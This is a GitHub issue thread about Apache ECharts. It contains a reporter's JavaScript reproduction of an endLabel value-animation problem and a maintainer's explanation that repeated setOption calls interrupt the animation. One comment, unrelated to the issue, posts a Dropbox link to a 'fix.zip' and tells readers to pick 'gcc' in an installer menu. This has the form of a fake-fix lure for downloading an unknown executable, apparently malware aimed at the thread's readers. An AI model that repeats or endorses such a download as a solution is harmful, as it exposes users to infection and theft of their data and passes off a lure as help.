### ISSUE TITLE
[Bug] line endlabel valueAnimation:true not work, the label numbers changed all at once, rather than gradually

### ISSUE THREAD

**Issue by jockiller** [apache/echarts#20292]
### Version

5.5.1

### Link to Minimal Reproduction

https://echarts.apache.org/examples/zh/editor.html?c=dynamic-data2&version=5.5.1

### Steps to Reproduce

copy this option in demo:

function randomData() {
  now = new Date(+now + oneDay);
  value = value + Math.random() * 21 - 10;
  return {
    name: now.toString(),
    value: [
      [now.getFullYear(), now.getMonth() + 1, now.getDate()].join('/'),
      Math.round(value)
    ]
  };
}
let data = [];
let now = new Date(1997, 9, 3);
let oneDay = 24 * 3600 * 1000;
let value = Math.random() * 1000;
for (var i = 0; i < 1000; i++) {
  data.push(randomData());
}
option = {
  animationDurationUpdate: 300,
  animationEasingUpdate:300,
  animationEasing: 'linear',
  animationEasingUpdate: 'linear',
  title: {
    text: 'Dynamic Data & Time Axis'
  },
  tooltip: {
    trigger: 'axis',
    formatter: function (params) {
      params = params[0];
      var date = new Date(params.name);
      return (
        date.getDate() +
        '/' +
        (date.getMonth() + 1) +
        '/' +
        date.getFullYear() +
        ' : ' +
        params.value[1]
      );
    },
    axisPointer: {
      animation: false
    }
  },
  xAxis: {
    type: 'time',
    splitLine: {
      show: false
    }
  },
  yAxis: {
    type: 'value',
    boundaryGap: [0, '100%'],
    splitLine: {
      show: false
    }
  },
  series: [
    {
      name: 'Fake Data',
      type: 'line',
      showSymbol: false,
      data: data,
      endLabel:{
        show: true,
        precision: 1,
        valueAnimation: true,
        formatter: function(params){
          return params.value[1]
        },
        fontWeight: 'bolder',
        fontSize: 20,
        color: '#FFF',
        textBorderColor: '#f50202',
        textBorderWidth: 3
      },
      animationDurationUpdate: 300,
    }
  ]
};
setInterval(function () {
  for (var i = 0; i < 5; i++) {
    data.shift();
    data.push(randomData());
  }
  myChart.setOption({
    series: [
      {
        data: data
      }
    ]
  });
}, 300);

### Current Behavior

number change all at once

### Expected Behavior

gradually change

### Environment

```markdown
- OS:mac
- Browser: edge
- Framework: html
```

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Ovilia** [comment]
You shouldn't calling `setOption` frequently when making endLabel animation. The correct way to use it is to provide the data once. If you call `setOption`, the animation is interrupted and thus making the above result. This is not a bug. Check the demo at [line-racing](https://echarts.apache.org/examples/zh/editor.html?c=line-race).

**Comment by jockiller** [comment]
@Ovilia  line-racing is right,but i want to xAxias and line data length keep immobilization. head pop tail push

**Comment by Ovilia** [comment]
Then I'm afraid your demo is probably the best you can get.

**Comment by jockiller** [comment]
ok thanks ,i will try another way
